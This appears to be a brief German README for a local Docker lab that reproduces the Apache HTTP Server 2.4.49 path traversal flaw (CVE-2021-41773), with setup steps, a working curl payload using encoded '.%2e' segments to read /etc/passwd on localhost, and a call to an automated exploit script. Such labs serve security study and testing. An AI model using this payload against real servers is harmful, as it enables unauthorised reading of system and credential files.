
Verwundbares Docker-Lab und Exploit für die Apache HTTP Server 2.4.49 Schwachstelle bei Pfad-Traversierung (CVE‑2021‑41773)
git clone https://github.com/zubairahm3d/apache-cve-2021-41773-lab.git
cd apache-cve-2021-41773-lab
chmod +x apache_lab.sh
Starten des anfälligen Servers:
./apache_lab.sh # choose option 1
Manueller Exploit:
curl --path-as-is http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Automatisierter Exploit:
python3 exploit.py
Server stoppen:
./apache_lab.sh # choose option 2



